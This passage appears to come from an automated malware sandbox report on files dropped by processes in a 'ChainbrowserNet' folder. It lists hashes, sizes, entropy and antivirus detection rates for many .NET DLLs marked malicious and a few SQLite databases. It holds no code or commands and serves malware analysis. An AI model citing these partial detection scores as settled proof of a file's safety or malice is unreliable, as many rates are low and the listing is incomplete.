                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):41472
                                                                                          Entropy (8bit):5.6808219961645605
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: kJrNOFEGbQ.exe, Detection: malicious
                                                                                          • Filename: VqGD18ELBM.exe, Detection: malicious
                                                                                          • Filename: f3I38kv.exe, Detection: malicious
                                                                                          • Filename: r6cRyCpdfS.exe, Detection: malicious
                                                                                          • Filename: Z4D3XAZ2jB.exe, Detection: malicious
                                                                                          • Filename: cbCjTbodwa.exe, Detection: malicious
                                                                                          • Filename: vb8DOBZQ4X.exe, Detection: malicious
                                                                                          • Filename: 6G8OR42xrB.exe, Detection: malicious
                                                                                          • Filename: XNPOazHpXF.exe, Detection: malicious
                                                                                          • Filename: 9FwQYJSj4N.exe, Detection: malicious
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):34304
                                                                                          Entropy (8bit):5.618776214605176
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 9%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):64000
                                                                                          Entropy (8bit):5.857602289000348
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):70144
                                                                                          Entropy (8bit):5.909536568846014
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                          MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                          SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                          SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                          SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):33280
                                                                                          Entropy (8bit):5.634433516692816
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):40448
                                                                                          Entropy (8bit):5.7028690200758465
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):126976
                                                                                          Entropy (8bit):6.057993947082715
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):34816
                                                                                          Entropy (8bit):5.636032516496583
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                          MD5:996BD447A16F0A20F238A611484AFE86
                                                                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):40448
                                                                                          Entropy (8bit):5.7028690200758465
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):33280
                                                                                          Entropy (8bit):5.634433516692816
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):50176
                                                                                          Entropy (8bit):5.723168999026349
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):294912
                                                                                          Entropy (8bit):6.010605469502259
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):32256
                                                                                          Entropy (8bit):5.631194486392901
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):39936
                                                                                          Entropy (8bit):5.660491370279985
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                          MD5:240E98D38E0B679F055470167D247022
                                                                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):85504
                                                                                          Entropy (8bit):5.8769270258874755
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):50176
                                                                                          Entropy (8bit):5.723168999026349
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):23552
                                                                                          Entropy (8bit):5.519109060441589
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):46592
                                                                                          Entropy (8bit):5.870612048031897
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):34304
                                                                                          Entropy (8bit):5.618776214605176
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 9%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):23552
                                                                                          Entropy (8bit):5.519109060441589
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):38912
                                                                                          Entropy (8bit):5.679286635687991
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):342528
                                                                                          Entropy (8bit):6.170134230759619
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):33792
                                                                                          Entropy (8bit):5.541771649974822
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):46592
                                                                                          Entropy (8bit):5.870612048031897
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):294912
                                                                                          Entropy (8bit):6.010605469502259
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
